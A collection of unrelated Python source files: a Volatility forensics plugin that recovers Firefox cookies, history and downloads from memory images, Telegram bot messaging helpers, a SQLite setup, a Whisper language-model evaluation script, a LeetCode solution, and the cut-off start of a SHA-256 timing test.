startTime, endTime, state, referrer, entityID, currBytes, maxBytes, mimeType, preferredApplication, preferredAction, autoResume)\n if not downloads.get(downloads_tuple):\n downloads[downloads_tuple] = downloads.get(downloads_tuple, 0) + 1\n yield downloads_tuple\n\n def render_text(self, outfd, data):\n self.table_header(outfd, [(\"Row Id\", \"6\"), (\"Name\", \"32\"), (\"Source\", \"80\"), (\"Target\", \"60\"), (\"Temp Path\", \"32\"), (\"Start Time\", \"26\"), (\"End Time\", \"26\"), (\"State\", \"5\"), (\"Referrer\", \"60\"), (\"Entity ID\", \"9\"), (\"Current Bytes\", \"12\"), (\"Max Bytes\", \"12\"), (\"MIME Type\", \"20\"), (\"Prefer App\", \"16\"), (\"Prefer Action\", \"13\"), (\"Auto Resume\", \"11\")])\n for row_id, name, source, target, tempPath, startTime, endTime, state, referrer, entityID, currBytes, maxBytes, mimeType, preferredApplication, preferredAction, autoResume in data:\n self.table_row(outfd, row_id, name, source, target, tempPath, str(startTime), str(endTime), state, referrer, entityID, currBytes, maxBytes, mimeType, preferredApplication, preferredAction, autoResume)\n\n def render_csv(self, outfd, data):\n outfd.write('\"id\",\"name\",\"source\",\"target\",\"temp_path\",\"start_time\",\"end_time\",\"state\",\"referrer\",\"entity_id\",\"current_bytes\",\"max_bytes\",\"mime_type\",\"prefer_app\",\"prefer_action\",\"auto_resume\"\\n')\n for d in data:\n csv.writer(outfd,quoting=csv.QUOTE_ALL).writerow(d)\n\n def render_body(self, outfd, data):\n for row_id, name, source, target, tempPath, startTime, endTime, state, referrer, entityID, currBytes, maxBytes, mimeType, preferredApplication, preferredAction, autoResume in data:\n start = sqlite_help.unix_time(startTime)\n end = sqlite_help.unix_time(endTime)\n download = source + \" -> \" + target + \" (\" + str(maxBytes) + \" bytes)\"\n download = download.replace(\"|\", \"-\")\n d = (0, \"[FIREFOXDOWNLOADS] \" + download, 0, \"---------------\", 0, 0, 0, 0, end, 0, start)\n csv.writer(outfd,delimiter=\"|\",quoting=csv.QUOTE_NONE,escapechar=\"\\\\\").writerow(d)\n\n\n\nclass FirefoxCookies(common.AbstractWindowsCommand):\n \"\"\" Scans for and parses potential Firefox cookies (cookies.sqlite moz_cookies table\"\"\"\n\n def __init__(self, config, *args, **kwargs):\n common.AbstractWindowsCommand.__init__(self, config, *args, **kwargs)\n\n def calculate(self):\n address_space = utils.load_as(self._config, astype = 'physical')\n\n # definite values in Cookie records\n scanner = FirefoxScanner(needles = ['\\x04\\x06\\x06\\x08',\n '\\x04\\x06\\x06\\x09',\n '\\x05\\x06\\x06\\x08',\n '\\x05\\x06\\x06\\x09',\n ])\n cookies = {}\n for offset in scanner.scan(address_space):\n ff_buff = address_space.read(offset-16, 4200)\n start = 16\n if (ord(ff_buff[start+4]) in (8,9)):\n good = False\n \n # start before the needle match and work backwards to the first record payload length\n start -= 1\n (path_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n path_length = sqlite_help.varint_to_text_length(path_length)\n\n start -= varint_len\n (host_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n host_length = sqlite_help.varint_to_text_length(host_length)\n\n start -= varint_len\n (value_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n value_length = sqlite_help.varint_to_text_length(value_length)\n\n start -= varint_len\n (name_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n name_length = sqlite_help.varint_to_text_length(name_length)\n start -= varint_len\n\n # newer versions add appId and inBrowserElement, they are INTEGER type \n # so if they exist, they will both have length values less than 12\n inBrowserElement_length = 0\n inBrowserElement = \"n/a\"\n appId_length = 0\n appId = \"n/a\"\n # if they don't exist, the previous value is a var int and could be something\n # like 0x81 0x10, so wee need to check both bytes\n if 0 < ord(ff_buff[start]) < 12 and 0 < ord(ff_buff[start-1]) < 12:\n (inBrowserElement_length, inBrowserElement) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n (appId_length, appId) = sqlite_help.varint_type_to_length(ord(ff_buff[start-1]))\n start -= 2\n\n (baseDomain_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n baseDomain_length = sqlite_help.varint_to_text_length(baseDomain_length)\n\n start -= varint_len\n (cookie_id_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n start -= varint_len\n (payload_header_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n start -= varint_len\n (row_id, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n start -= varint_len\n (payload_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n # start of record reached, so jump back to the needle, then work forward\n start = 16\n\n (expiry_length, expiry) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n (lastAccessed_length, lastAccessed) = sqlite_help.varint_type_to_length(ord(ff_buff[start+1]))\n (creationTime_length, creationTime) = sqlite_help.varint_type_to_length(ord(ff_buff[start+2]))\n (isSecure_length, isSecure) = sqlite_help.varint_type_to_length(ord(ff_buff[start+3]))\n (isHttpOnly_length, isHttpOnly) = sqlite_help.varint_type_to_length(ord(ff_buff[start+4]))\n\n start += 5\n\n cookie_id = ff_buff[start:start+cookie_id_length]\n cookie_id = sqlite_help.sql_unpack(cookie_id)\n\n baseDomain = ff_buff[start:start+baseDomain_length]\n start += baseDomain_length\n\n # if the length is > 0, it will need to be set\n # if it == 0, it was already set in the call earlier\n # otherwise, the value should be \"n/a\" from initialization because it's an older version\n if inBrowserElement_length > 0:\n inBrowserElement = ff_buff[start:start+inBrowserElement_length]\n inBrowserElement = sqlite_help.sql_unpack(inBrowserElement)\n start += inBrowserElement_length\n \n if appId_length > 0:\n appID = ff_buff[start:start+appId_length]\n appId = sqlite_help.sql_unpack(appId)\n start += appId_length\n\n name = ff_buff[start:start+name_length]\n start += name_length\n\n value = ff_buff[start:start+value_length]\n start += value_length\n\n host = ff_buff[start:start+host_length]\n start += host_length\n\n path = ff_buff[start:start+path_length]\n start += path_length\n\n # get the 3 time fields and do a check that a valid date is returned\n expiry = ff_buff[start:start+expiry_length]\n expiry = sqlite_help.sql_unpack(expiry)\n if expiry > 0 and expiry:\n expiry = sqlite_help.get_nixtime_from_sec(expiry)\n if type(expiry) is not datetime:\n continue\n start += expiry_length\n\n lastAccessed = ff_buff[start:start+lastAccessed_length]\n lastAccessed = sqlite_help.sql_unpack(lastAccessed)\n if lastAccessed > 0 and lastAccessed:\n lastAccessed = sqlite_help.get_nixtime_from_msec(lastAccessed)\n if type(lastAccessed) is not datetime:\n continue\n start += lastAccessed_length\n\n creationTime = ff_buff[start:start+creationTime_length]\n creationTime = sqlite_help.sql_unpack(creationTime)\n if creationTime > 0 and creationTime:\n creationTime = sqlite_help.get_nixtime_from_msec(creationTime)\n if type(creationTime) is not datetime:\n continue\n start += creationTime_length\n\n # if all 3 dates are 1970, it's likely a garbage record, so skip\n # if any of them are real dates, it could be an old or partially overwritten record, so print\n if expiry.year == 1970 and lastAccessed.year == 1970 and creationTime.year ==1970:\n continue\n\n if isSecure_length > 0:\n isSecure = ff_buff[start:start+isSecure_length]\n isSecure = sqlite_help.sql_unpack(isSecure)\n start += isSecure_length\n \n if isHttpOnly_length > 0:\n isHttpOnly = ff_buff[start:start+isHttpOnly_length]\n isHttpOnly = sqlite_help.sql_unpack(isHttpOnly)\n start += isHttpOnly_length\n \n # add all fields to the tuple so we only print unique records once\n cookie_tuple = (row_id, baseDomain, appId, inBrowserElement, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly)\n if not cookies.get(cookie_tuple):\n cookies[cookie_tuple] = cookies.get(cookie_tuple, 0) + 1\n yield cookie_tuple\n\n def render_text(self, outfd, data):\n self.table_header(outfd, [(\"Row ID\", \"6\"), (\"Base Domain\", \"28\"), (\"App Id\",\"6\"), (\"InBrowserElement\", \"16\"), (\"Name\", \"24\"), (\"Value\", \"32\"), (\"Host\", \"32\"), (\"Path\", \"32\"), (\"Expiry\", \"20\"), (\"Last Accessed\", \"26\"), (\"Creation Time\", \"26\"), (\"Secure\", \"6\"), (\"HttpOnly\", \"6\")])\n for row_id, baseDomain, appId, inBrowserElement, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly in data:\n self.table_row(outfd, row_id, baseDomain, appId, inBrowserElement, name, value, host, path, str(expiry), str(lastAccessed), str(creationTime), isSecure, isHttpOnly)\n\n def render_csv(self, outfd, data):\n outfd.write('\"id\",\"base_domain\",\"app_id\",\"inbrowserelement\",\"name\",\"value\",\"host\",\"path\",\"expiry\",\"last_accessed\",\"creation_time\",\"secure\",\"httponly\"\\n')\n for d in data:\n csv.writer(outfd,quoting=csv.QUOTE_ALL).writerow(d)\n\n def render_body(self, outfd, data):\n for row_id, baseDomain, appId, inBrowserElement, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly in data:\n start = sqlite_help.unix_time(creationTime)\n end = sqlite_help.unix_time(lastAccessed)\n cookie = host + \" \" + path + \" \" + name + \" = \" + value\n cookie = cookie.replace(\"|\", \"-\")\n d = (0, \"[FIREFOXCOOKIES] \" + cookie, 0, \"---------------\", 0, 0, 0, 0, end, 0, start)\n csv.writer(outfd,delimiter=\"|\",quoting=csv.QUOTE_NONE,escapechar=\"\\\\\").writerow(d)\n\n\n\nclass FirefoxHistory(common.AbstractWindowsCommand):\n \"\"\" Scans for and parses potential Firefox url history (places.sqlite moz_places table)\"\"\"\n\n def __init__(self, config, *args, **kwargs):\n common.AbstractWindowsCommand.__init__(self, config, *args, **kwargs)\n\n def calculate(self):\n address_space = utils.load_as(self._config, astype = 'physical')\n\n # definite values in History records\n scanner = FirefoxScanner(needles = ['\\x06\\x25',\n '\\x00\\x25',\n ])\n urls = {}\n for offset in scanner.scan(address_space):\n ff_buff = address_space.read(offset-21, 3000)\n start = 21\n # new field foreign_count added around Firefox v34\n foreign_count_length = 0\n foreign_count = \"N/A\"\n\n # start before the needle match and work backwards\n if ord(ff_buff[start-1]) in (1, 2, 8, 9):\n start -= 1\n (frecency_length, frecency) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n else:\n continue\n\n if ord(ff_buff[start-1]) in (0, 1, 8, 9):\n start -= 1\n (favicon_id_length, favicon_id) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n else:\n continue\n\n if ord(ff_buff[start-1]) not in (8, 9):\n continue\n start -= 1\n (typed_length, typed) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n\n if ord(ff_buff[start-1]) not in (8, 9):\n continue\n start -= 1\n (hidden_length, hidden) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n\n if ord(ff_buff[start-1]) in (1, 8, 9):\n start -= 1\n (visit_count_length, visit_count) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n else:\n continue\n\n start -= 1\n (rev_host_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n rev_host_length = sqlite_help.varint_to_text_length(rev_host_length)\n\n start -= varint_len\n (title_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n title_length = sqlite_help.varint_to_text_length(title_length)\n \n start -= varint_len\n (url_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n url_length = sqlite_help.varint_to_text_length(url_length)\n \n start -= varint_len\n url_id_length = ord(ff_buff[start])\n\n start -= 1\n payload_header_length = ord(ff_buff[start])\n payload_header_end = start + payload_header_length\n\n start -= 1\n (row_id, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n # can't have a negative row_id (index)\n if row_id < 0:\n continue\n\n start -= varint_len\n if start < 0:\n continue\n (payload_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n # payload_length should be much longer than this, but this is a safe minimum\n if payload_length < 6:\n continue\n\n # go back to the needle match and start processing forward\n (last_visit_date_length, last_visit_date) = sqlite_help.varint_type_to_length(ord(ff_buff[21]))\n (guid_length, varint_len) = sqlite_help.find_varint(ff_buff, 22, FORWARD)\n guid_length = sqlite_help.varint_to_text_length(guid_length)\n start = 22 + varint_len\n\n # Firefox added a \"foreign_count\" field that needs to be handled\n if start != payload_header_end:\n (foreign_count_length, foreign_count) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n start += 1\n\n url_id = sqlite_help.sql_unpack(ff_buff[start:start+url_id_length])\n\n start += url_id_length\n url = ff_buff[start:start+url_length]\n\n start += url_length\n title = ff_buff[start:start+title_length]\n\n start += title_length\n rev_host = ff_buff[start:start+rev_host_length]\n\n start += rev_host_length\n if visit_count_length > 0:\n visit_count = sqlite_help.sql_unpack(ff_buff[start:start+visit_count_length])\n\n start += visit_count_length\n if hidden_length > 0:\n hidden = sqlite_help.sql_unpack(ff_buff[start:start+hidden_length])\n\n start += hidden_length\n if typed_length > 0:\n typed = sqlite_help.sql_unpack(ff_buff[start:start+typed_length])\n\n start += typed_length\n favicon_id = \"\"\n if favicon_id_length > 0:\n favicon_id = sqlite_help.sql_unpack(ff_buff[start:start+favicon_id_length])\n\n start += favicon_id_length\n if frecency_length > 0:\n frecency = sqlite_help.sql_unpack(ff_buff[start:start+frecency_length])\n\n # extract the time, unpack it to an integer, convert microseconds to string\n start += frecency_length\n last_visit_date = ff_buff[start:start+last_visit_date_length]\n last_visit_date = sqlite_help.sql_unpack(last_visit_date)\n if last_visit_date_length == 8 and last_visit_date < 0:\n continue\n if last_visit_date > 1 and last_visit_date:\n last_visit_date = sqlite_help.get_nixtime_from_msec(last_visit_date)\n if last_visit_date_length == 8 and type(last_visit_date) is datetime and last_visit_date.year == 1970:\n continue\n\n start += last_visit_date_length\n guid = ff_buff[start:start+guid_length]\n\n start += guid_length\n if foreign_count_length > 0:\n foreign_count = sqlite_help.sql_unpack(ff_buff[start:start+foreign_count_length])\n start += foreign_count_length\n\n # save the values as a tuple in a dictionary so we only print one unique row\n url_tuple = (row_id, url, title, rev_host, visit_count, hidden, typed, favicon_id, frecency, last_visit_date, guid, foreign_count) \n if not urls.get(url_tuple):\n urls[url_tuple] = urls.get(url_tuple, 0) + 1\n yield url_tuple\n\n def render_text(self, outfd, data):\n self.table_header(outfd, [(\"ID\", \"6\"), (\"URL\", \"80\"), (\"Title\", \"80\"), (\"Rev Host\", \"32\"), (\"Visits\", \"6\"), (\"Hidden\", \"6\"), (\"Typed\", \"5\"), (\"Favicon ID\", \"10\"), (\"Frecency\", \"8\"), (\"Last Visit Date\", \"26\"), (\"GUID\", \"12\"),(\"FOREIGN COUNT\",\"13\")])\n for row_id, url, title, rev_host, visit_count, hidden, typed, favicon_id, frecency, last_visit_date, guid, foreign_count in data:\n self.table_row(outfd, row_id, url, title, rev_host, visit_count, hidden, typed, favicon_id, frecency, str(last_visit_date), guid, foreign_count)\n\n def render_csv(self, outfd, data):\n outfd.write('\"id\",\"url\",\"title\",\"rev_host\",\"visit_count\",\"hidden\",\"typed\",\"favicon_id\",\"frecency\",\"last_visit_date\",\"guid\",\"foreign_count\"\\n')\n for d in data:\n csv.writer(outfd,quoting=csv.QUOTE_ALL).writerow(d)\n\n def render_body(self, outfd, data):\n for row_id, url, title, rev_host, visit_count, hidden, typed, favicon_id, frecency, last_visit_date, guid in data:\n if type(last_visit_date) is str:\n end = 0\n else:\n end = sqlite_help.unix_time(last_visit_date)\n history = url + \" -- \" + title\n history = history.replace(\"|\", \"-\")\n d = (0, \"[FIREFOXHISTORY] \" + history, 0, \"---------------\", 0, 0, 0, 0, end, 0, 0)\n csv.writer(outfd,delimiter=\"|\",quoting=csv.QUOTE_NONE,escapechar=\"\\\\\").writerow(d)\n","repo_name":"volatilityfoundation/community","sub_path":"DaveLasalle/firefoxhistory.py","file_name":"firefoxhistory.py","file_ext":"py","file_size_in_byte":27780,"program_lang":"python","lang":"en","doc_type":"code","stars":331,"dataset":"github-code","pt":"37"} +{"seq_id":"11972359610","text":"import asyncio\nimport urllib.request\nimport requests\nfrom config import Config\n\nMAIN_URL = \"https://api.telegram.org/\"\nTOKEN = Config.BOT_TOKEN\n\ndef message(update,context,text = \"\"):\n bot = context.bot\n chat = update.effective_chat.id\n msg = bot.send_message(chat,text,parse_mode='HTML')\n return msg\n\ndef messageMarkdown(update,context, text= \"\"):\n bot = context.bot\n chat = update.effective_chat.id\n msg = bot.send_message(chat,text,parse_mode='MarkdownV2')\n return msg\n\ndef messageWithId(update,context,chat,text = \"\"):\n bot = context.bot\n msg = bot.send_message(chat,text,parse_mode='HTML')\n return msg\n\ndef reply_message(update,context,text = \"\"):\n msg = update.message.reply_text(text,parse_mode='HTML')\n return msg\n\ndef PrivateMessage(update,context, text = \"\"):\n bot = context.bot\n msg = bot.send_message(update.message.from_user.id,text,parse_mode='HTML')\n return msg\n\ndef messagePhoto(update, context, img, desc = ''):\n bot = context.bot\n photo = bot.sendPhoto(chat_id=update.effective_chat.id, photo=img, caption=desc, parse_mode='HTML')\n return photo\n\ndef ApiMessage(text, chat_id):\n text = urllib.parse.quote_plus(text)\n url = MAIN_URL + \"bot{}/sendmessage?chat_id={}&text={}&parse_mode=HTML\".format(TOKEN, chat_id, text)\n send = requests.get(url)\n return send\n\nasync def messageWithAsync(update,context,delay,text = \"\"):\n bot = context.bot\n chat = update.effective_chat.id\n await asyncio.sleep(delay)\n msg = bot.send_message(chat,text,parse_mode='HTML')\n return msg\n\nasync def messageWithAsyncById(update,context,chat,delay,text = \"\"):\n bot = context.bot\n await asyncio.sleep(delay)\n msg = bot.send_message(chat,text,parse_mode='HTML')\n return msg","repo_name":"StormDev87/nebula8","sub_path":"core/utilities/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"4199381408","text":"import sqlite3\nDB_STUDENT = \"D:\\\\Project\\\\Radicali\\\\py_api_assignment\\\\.data\\\\EQUIPMENTS.db\"\n\ndef get_db():\n conn = sqlite3.connect(DB_STUDENT)\n return conn\n\n\ndef create_tables():\n tables = [\n \"\"\"CREATE TABLE IF NOT EXISTS EQUIPMENTS(\n ID INTEGER PRIMARY KEY AUTOINCREMENT,\n NAME TEXT NOT NULL,\n\t\t\t\tSTATUS TEXT NOT NULL,\n REQUEST TEXT\n )\n \"\"\"\n ]\n db = get_db()\n cursor = db.cursor()\n for table in tables:\n cursor.execute(table)\n\n","repo_name":"bakharia/py_api_assignment","sub_path":"create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72107085548","text":"import os, sys\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nfrom typing import Optional, List\nfrom functools import partial\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nimport pandas as pd\nfrom tqdm.auto import tqdm\n\nfrom transformers.models.whisper import (WhisperTokenizer,\n WhisperTokenizerFast,\n WhisperFeatureExtractor)\nfrom optimum.bettertransformer import BetterTransformer\n\nfrom dataloader.dataset_for_evaluation.base_dataset_group import BaseDatasetGroup\nfrom dataloader.collator import DataCollatorSpeechSeq2SeqWithPadding\nfrom dataloader.preprocessing_train.preprocessing import prepare_dataset_fct\nfrom models.whisper_zero_cross_attention import WhisperForConditionalGenerationZeroCrossAttention\nfrom utils.constants import DEFAULT_LABEL_TOKENIZED_COL, DEFAULT_EVAL_BATCH_SIZE, DEFAULT_NUM_PROC\n\n\ndef eval_whisper_implicit_lm_on_dataset_group(pretrained_model_name_or_path: str,\n ds_group: BaseDatasetGroup,\n batch_size: int = DEFAULT_EVAL_BATCH_SIZE, # only 1 is supported for now\n fast_tokenizer: bool = True,\n task: str=\"transcribe\",\n zero_shot: bool = False) -> pd.Series:\n \n if ds_group.is_multilingual:\n assert ds_group.language is None, \"Language must be `None` for multilingual datasets as it is inferred from the BaseDatasetGroup's metadata.\"\n \n if torch.cuda.is_available():\n device = \"cuda:0\"\n torch_dtype = torch.float16 # see https://huggingface.co/learn/audio-course/chapter5/evaluation?fw=pt\n elif torch.backends.mps.is_available(): # for Apple Silicon\n device = torch.device('mps')\n torch_dtype = torch.float32 # float16 not supported by MPS\n else:\n device = \"cpu\"\n torch_dtype = torch.float32\n\n # Load model:\n model = WhisperForConditionalGenerationZeroCrossAttention.from_pretrained(pretrained_model_name_or_path, torch_dtype=torch_dtype).to(device)\n \n if device == \"cuda:0\":\n model = BetterTransformer.transform(model)\n\n # Loop over the datasets:\n ppl_results = []\n tbar = tqdm(ds_group.items())\n \n for dataset_name, dataset in tbar:\n tbar.set_description(f\"Evaluating {dataset_name}...\")\n \n if not ds_group.is_multilingual:\n language = ds_group.language\n else:\n language = ds_group.ds_name_to_lang[dataset_name]\n \n if zero_shot:\n language = None\n task = None\n\n if fast_tokenizer:\n tokenizer = WhisperTokenizerFast.from_pretrained(pretrained_model_name_or_path, language=language, task=task)\n else:\n tokenizer = WhisperTokenizer.from_pretrained(pretrained_model_name_or_path, language=language, task=task)\n \n feature_extractor = WhisperFeatureExtractor.from_pretrained(pretrained_model_name_or_path)\n \n prepare_dataset = partial(prepare_dataset_fct,\n tokenizer=tokenizer,\n feature_extractor=feature_extractor)\n dataset = dataset.map(prepare_dataset, num_proc=DEFAULT_NUM_PROC)\n\n # Load data collator:\n data_collator = DataCollatorSpeechSeq2SeqWithPadding(tokenizer=tokenizer,\n feature_extractor=feature_extractor,\n return_attention_mask=True)\n\n dataloader = DataLoader(dataset, batch_size=batch_size, collate_fn=data_collator)\n\n # Placeholders for per-batch perplexities:\n ppl_per_batch: List[torch.Tensor] = []\n \n for batch in dataloader:\n # Note that we need to move the data to the device manually (which is not the case with Trainer):\n input_features = batch[\"input_features\"].to(device).to(torch_dtype)\n attention_mask = batch[\"attention_mask\"].to(device)\n tokenized_seq = batch[DEFAULT_LABEL_TOKENIZED_COL].to(device)\n\n if not zero_shot:\n tokenized_seq = concat_special_tokens(tokenized_seq,\n pretrained_model_name_or_path,\n language=language,\n task=task)\n attention_mask_prefix = torch.Tensor([1, 1, 1, 1]).expand(attention_mask.shape[0], -1).to(attention_mask.device)\n attention_mask = torch.cat([attention_mask_prefix, attention_mask[:, 2:]], dim=1)\n\n # Shift inputs for next-word prediction:\n decoder_input_ids = tokenized_seq[:, 1:] # [w1, w2, ..., wN, EOT]\n decoder_input_ids_right_shifted = tokenized_seq[:, :-1] # [SOT, w1, w2, ..., wN]\n attention_mask_right_shifted = attention_mask[:, :-1]\n\n # One-step generation:\n with torch.no_grad():\n output = model.forward(input_features=input_features,\n decoder_input_ids=decoder_input_ids_right_shifted,\n attention_mask=attention_mask_right_shifted)\n \n # Convert logits to log-probabilities:\n log_prob_all = torch.nn.functional.log_softmax(output.logits, dim=-1) # (batch_size, seq_len, vocab_size)\n\n # Take probabilities for the ground-truth tokens:\n log_prob_tokens = log_prob_all.take_along_dim(decoder_input_ids[..., None], dim=-1).squeeze(dim=-1) # (batch_size, seq_len)\n\n # FIXME: The current implementation predicts is not correct as EOT will be discarded only for the longest sequence in the batch.\n # For the other sequences, the prediction for the EOT token will be taken into account in the perplexity computation.\n # We hypothesize that this is negligible as a well-trained model should predict that EOT follows EOT with a very high probability.\n \n # All the values associated to the pad tokens will be set to 0 in order to ignore them when we will sum.\n log_prob_seq = log_prob_tokens.masked_fill(attention_mask_right_shifted.eq(0), 0).sum(dim=-1) # (batch_size,)\n mean_log_prob_seq = log_prob_seq / attention_mask_right_shifted.sum(dim=-1) # (batch_size,)\n \n # Compute perplexity:\n perplexity = torch.exp(-mean_log_prob_seq) # (batch_size,)\n \n # Add to the list of perplexities:\n ppl_per_batch.append(perplexity)\n \n # Add to the list of perplexities:\n ppl_current_dataset = torch.cat(ppl_per_batch, dim=0).mean().item()\n ppl_results.append(ppl_current_dataset)\n \n # Save the results:\n results = pd.Series(ppl_results, index=list(ds_group.keys()), name=\"Perplexity\")\n results.index.name = \"Dataset\"\n \n # Compute the average WER:\n results[\"Average\"] = results.mean()\n \n # Round the results:\n results = results.round(2)\n \n return results\n\n\ndef concat_special_tokens(x: torch.Tensor,\n pretrained_model_name_or_path: str,\n language: Optional[str] = None,\n task: Optional[str] = None) -> torch.Tensor:\n \"\"\"\n Concatenate the language and task special tokens to the tokenized labels (batched).\n Important: We assumed that all token sequences begin with `, `.\n \"\"\"\n tokenizer = WhisperTokenizer.from_pretrained(pretrained_model_name_or_path, language=language, task=task)\n special_tokens = torch.LongTensor([tokenizer(\"\").input_ids[:4]]).expand(x.shape[0], -1).to(x.device)\n x = torch.cat([special_tokens, x[:, 2:]], dim=1)\n return x\n","repo_name":"tonywu71/distilling-and-forgetting-in-large-pre-trained-models","sub_path":"evaluation/eval_whisper_implicit_lm_on_dataset.py","file_name":"eval_whisper_implicit_lm_on_dataset.py","file_ext":"py","file_size_in_byte":7992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22525972047","text":"class Solution:\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n print(f\"s1:{s1}, s2:{s2}, s3:{s3}\")\n\n if not s1 and not s2:\n if s3:\n return False\n return True\n \n if s1+s2 == s3:\n return True\n \n if not s2 and s1 != s3:\n return False\n elif not s1 and s2 != s3:\n return False\n\n if len(s1) + len(s2) != len(s3):\n return False\n\n memo = [[0 for _ in range(len(s1))] for _ in range(len(s2))]\n\n print(\"initial memo\")\n for row in memo:\n print(row)\n\n # if not memo:\n # return False\n\n for r in range(len(memo)): # along s2 (rows)\n for c in range(len(memo[0])): # along s1 (cols)\n print(f\"--- r:{r}, c:{c}\")\n\n # if c > len(s3)-1 or r > len(s3)-1:\n # return False\n\n #print(f\"s1[c]:{s1[c]}, s2[r]:{s2[r]}\")\n\n \"\"\"\n abaa\n a a\n a [1, 1]\n b [0, 0]\n\n r=1, c=0\n s1[0] s3[0]\n \"\"\"\n\n if r==c==0:\n memo[r][c] = 1 # if both str empty, then output should be true\n elif r==0 and c>0 and s2[c-1]==s3[c-1] and memo[r][c-1]==1: \n #print(f\"elif reached: s1[c]:{s1[c]}, s2[r]:{s2[r]}\")\n memo[r][c] = memo[r][c-1] # 0, 1\n print(\"A\")\n elif r>0 and c==0 and s1[r-1]==s3[r-1] and memo[r-1][c]==1:\n memo[r][c] = memo[r-1][c]\n print(\"B\")\n elif r!=0 and c!=0 and s1[r-1]==s3[r+c-1] and memo[r-1][c]==1:\n memo[r][c] = memo[r-1][c]\n print(\"C\")\n elif r!=0 and c!=0 and s2[c-1]==s3[r+c-1] and memo[r][c-1]==1:\n memo[r][c] = memo[r][c-1]\n print(\"D\")\n else:\n memo[r][c] = 0\n print(\"E\")\n\n for row in memo:\n print(row)\n\n # print(\"memo after for loop\")\n # for row in memo:\n # print(row)\n\n return memo[-1][-1] == 1\n \n def test1(self):\n s1 = \"aabcc\"\n s2 = \"dbbca\"\n s3 = \"aadbbcbcac\"\n res = self.isInterleave(s1, s2, s3)\n # expected True\n print(\"res: \", res)\n \n def test2(self):\n s1 = \"aabcc\"\n s2 = \"dbbca\"\n s3 = \"aadbbbaccc\"\n res = self.isInterleave(s1, s2, s3)\n # expected False\n print(\"res: \", res)\n \n def test3(self):\n s1 = \"\"\n s2 = \"\"\n s3 = \"\"\n res = self.isInterleave(s1, s2, s3)\n # expected True\n print(\"res: \", res)\n\n def test4(self):\n s1 = \"\"\n s2 = \"\"\n s3 = \"a\"\n res = self.isInterleave(s1, s2, s3)\n # expected False\n print(\"res: \", res)\n \n def test5(self):\n s1 = \"\"\n s2 = \"a\"\n s3 = \"a\"\n res = self.isInterleave(s1, s2, s3)\n # expected True\n print(\"res: \", res)\n\n def test6(self):\n s1 = \"a\"\n s2 = \"\"\n s3 = \"c\"\n res = self.isInterleave(s1, s2, s3)\n # expected False\n print(\"res: \", res)\n\n def test7(self):\n s1 = \"a\"\n s2 = \"b\"\n s3 = \"a\"\n res = self.isInterleave(s1, s2, s3)\n # expected False\n print(\"res: \", res)\n \n def test8(self):\n s1 = \"db\"\n s2 = \"b\"\n s3 = \"cbb\"\n res = self.isInterleave(s1, s2, s3)\n # expected False\n print(\"res: \", res)\n \n def test9(self): # Fails (TODO)\n s1 = \"aa\"\n s2 = \"ab\"\n s3 = \"abaa\"\n res = self.isInterleave(s1, s2, s3)\n # expected True\n print(\"res: \", res)\n\ns = Solution()\n# s.test1()\n# s.test2()\n# s.test3()\n# s.test4()\n# s.test5()\n# s.test6()\n# s.test7()\n# s.test8()\ns.test9()","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/leetcode/lc97_interleaving_string.py","file_name":"lc97_interleaving_string.py","file_ext":"py","file_size_in_byte":3980,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"38344274949","text":"import matplotlib.pyplot as plt\nimport numpy as np \nimport os\nimport random\nimport string\nimport subprocess\nimport sys\nimport time\n\n# Hardcoding location of source code to use within this repository\nSRC_CODE_DIR_PATH = \"../C/\"\nEXEC_NAME = \"CryptoTestC\"\n\n# Function to generate a random ascii string of a given length\ndef GenRandString(length):\n new_str = \"\".join([random.choice(string.ascii_letters + string.digits) for x in range(length)])\n return new_str\n\n# Function to calculate hamming weight of a passed in string\ndef GetStrHammingWeight(string):\n weight = 0\n for char in string:\n num_char = ord(char)\n while num_char != 0:\n if num_char & 1:\n weight += 1\n num_char = num_char >> 1\n return weight\n\n# Simple function to generate a plot showing the duration\n# of Sha256 runs for randomly generate ascii string inputs.\n# Plot: x-axis = hamming weights, y-axis = raw time.time duration\ndef Sha256HammingWeightDurationTest():\n cmd = SRC_CODE_DIR_PATH + EXEC_NAME\n str_length = 10000\n num_data_points = 20000\n h_weights = []\n times = []\n\n if os.path.exists(cmd) == False:\n 